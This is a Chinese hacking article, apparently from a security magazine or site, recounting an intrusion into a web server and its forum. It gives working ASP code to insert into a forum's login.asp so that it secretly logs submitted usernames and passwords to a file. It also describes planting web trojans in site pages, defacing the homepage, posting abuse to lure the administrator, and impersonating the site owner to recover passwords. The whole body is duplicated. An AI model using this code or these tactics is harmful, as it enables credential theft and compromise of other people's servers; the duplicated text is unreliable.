减小字体
增大字体- ·上一篇文章:活地运用SQL Injection做数据库渗透
- ·下一篇文章:瑞星公司09月13日发布 每日计算机病毒及木马播报
另类巧妙的思路:旁门左道的入侵
空子可以钻。去看看他网站上有什么东西吧,他这样的管理员各个地方用的密码不会都不一样吧?网站上有个动网sp2的,把数据库由asp的copy成mdb的下载下来看看。在Dv_log里没有找到密码,看到了注册时间最早的那个家伙(这个当然就是管理员了自己!)的密码,拿下来跑跑。可是半天也没有跑出来啊,急!我破解不出来我还不会等着你往我家里送啊?干脆找到了bbs的login.asp在里面加了点东西:
<%
dim Name,password,fso,file //定义后面要用到的变量//
Name = Request("username") //取得浏览器传过来的username变量//
Password = Request("password") //取得浏览器传过来的Password变量//
Const ForReading = 1, ForWriting = 2, ForAppending = 8 //定义后面写文件的参数//
Set fso = Server.createObject("Scripting.FileSystemObject") //取得Fso对象,准备写文件//
Const path = "D:\mir3\bbs\admin_list.asp" //定义要写的文件路径//
set file=fso.opentextfile(path, ForAppending, TRUE) //取得文件对象//
file.write(Name) & " " //写取得的用户名//
file.write(Password) & "||" //写取得的密码,并用||分隔开//
file.close //关闭文件//
set file = nothing //释放变量//
set fso = nothing //释放变量//
%>
注意的是里面request的变量,具体的字段自己改!还有后面你要存放的文件地址,这个也根据情况自己填了,以后经常来看看得到的东西就行了,我比较关注的是admin!如图四。又一个个陷阱挖好了,等管理员钻了。可是好象不知道他什么时候登陆呢,我干脆去当会坏人,发了几个人身攻击的帖子,灌了一会恶意的水就不信你管理员熬得住不上来删帖子!(不是我的本意,大家原谅!)嘿嘿
再转悠了几下子,发现C:\Program Files下有3721,乖乖,难道服务器还有人拿来上网啊?不过也不排除那种可能,二话不说,找人要了最新的网页木马的代码,找网站几个关键的页面插进去,如图五哈哈,又是一个陷阱,只要你打开Ie上网!再找找,发现这个管理员还好,服务器上不聊QQ,也没有什么游戏,要不然我们又可以给他捆上个东西,捆什么?当然是木马了!我还真遇到有人在服务器聊QQ玩连连看外加看少儿不易的东西,呵呵,这样的机器要是还搞不定就真是你的问题了。
这个机器上基本上已经到处是陷阱了,只等管理员上线了,我可等不急了,催催他吧!拿出经典的黑站图片,插入网页木马在里面替换主页黑了他!(这里我了解管理员的水平所以这么做的,大家千万不要模仿!)就等他发现了,我们的陷阱可是在等他的啊!可是这个网站好象人气不怎么好,等了半天也没有人清除黑页。算了,中招是迟早的事了,你要是没有耐心在网站上找下他的QQ告诉他,注意社会工程学的应用啊,呵呵。
这里还要说点其他的,得到webshell和权限有更好的办法,上那个可以查询网站信息的站点,http://www.webhosting.info查询下他的信息,如图六,注册个相似的邮箱,或者直接打电话,然后冒充下站长说自己的密码丢了,偶不怎么擅长这个,所以都是听人家说的,可是上次跟小默上电信机房发现那里检查真不是怎么严,签个名就让进去,进去之后还什么都不管。一些服务器就那样开着,管理员已经登陆但是人不在,还有一些很重要的服务器都可以直接操作的,真不知道放个马到网关上去会怎么样,这里说的东西或许有些偏离黑客的技术了,但是,你敢保证这些旁门左道不会威胁到你的主机的安全?意识很重要,安全再怎么小心都不为过,好了,我就说到这里,有什么问题可以到在杂志补充或者论坛讨论,我的ID是剑心
<%
dim Name,password,fso,file //定义后面要用到的变量//
Name = Request("username") //取得浏览器传过来的username变量//
Password = Request("password") //取得浏览器传过来的Password变量//
Const ForReading = 1, ForWriting = 2, ForAppending = 8 //定义后面写文件的参数//
Set fso = Server.createObject("Scripting.FileSystemObject") //取得Fso对象,准备写文件//
Const path = "D:\mir3\bbs\admin_list.asp" //定义要写的文件路径//
set file=fso.opentextfile(path, ForAppending, TRUE) //取得文件对象//
file.write(Name) & " " //写取得的用户名//
file.write(Password) & "||" //写取得的密码,并用||分隔开//
file.close //关闭文件//
set file = nothing //释放变量//
set fso = nothing //释放变量//
%>
注意的是里面request的变量,具体的字段自己改!还有后面你要存放的文件地址,这个也根据情况自己填了,以后经常来看看得到的东西就行了,我比较关注的是admin!如图四。又一个个陷阱挖好了,等管理员钻了。可是好象不知道他什么时候登陆呢,我干脆去当会坏人,发了几个人身攻击的帖子,灌了一会恶意的水就不信你管理员熬得住不上来删帖子!(不是我的本意,大家原谅!)嘿嘿
再转悠了几下子,发现C:\Program Files下有3721,乖乖,难道服务器还有人拿来上网啊?不过也不排除那种可能,二话不说,找人要了最新的网页木马的代码,找网站几个关键的页面插进去,如图五哈哈,又是一个陷阱,只要你打开Ie上网!再找找,发现这个管理员还好,服务器上不聊QQ,也没有什么游戏,要不然我们又可以给他捆上个东西,捆什么?当然是木马了!我还真遇到有人在服务器聊QQ玩连连看外加看少儿不易的东西,呵呵,这样的机器要是还搞不定就真是你的问题了。
这个机器上基本上已经到处是陷阱了,只等管理员上线了,我可等不急了,催催他吧!拿出经典的黑站图片,插入网页木马在里面替换主页黑了他!(这里我了解管理员的水平所以这么做的,大家千万不要模仿!)就等他发现了,我们的陷阱可是在等他的啊!可是这个网站好象人气不怎么好,等了半天也没有人清除黑页。算了,中招是迟早的事了,你要是没有耐心在网站上找下他的QQ告诉他,注意社会工程学的应用啊,呵呵。
这里还要说点其他的,得到webshell和权限有更好的办法,上那个可以查询网站信息的站点,http://www.webhosting.info查询下他的信息,如图六,注册个相似的邮箱,或者直接打电话,然后冒充下站长说自己的密码丢了,偶不怎么擅长这个,所以都是听人家说的,可是上次跟小默上电信机房发现那里检查真不是怎么严,签个名就让进去,进去之后还什么都不管。一些服务器就那样开着,管理员已经登陆但是人不在,还有一些很重要的服务器都可以直接操作的,真不知道放个马到网关上去会怎么样,这里说的东西或许有些偏离黑客的技术了,但是,你敢保证这些旁门左道不会威胁到你的主机的安全?意识很重要,安全再怎么小心都不为过,好了,我就说到这里,有什么问题可以到在杂志补充或者论坛讨论,我的ID是剑心
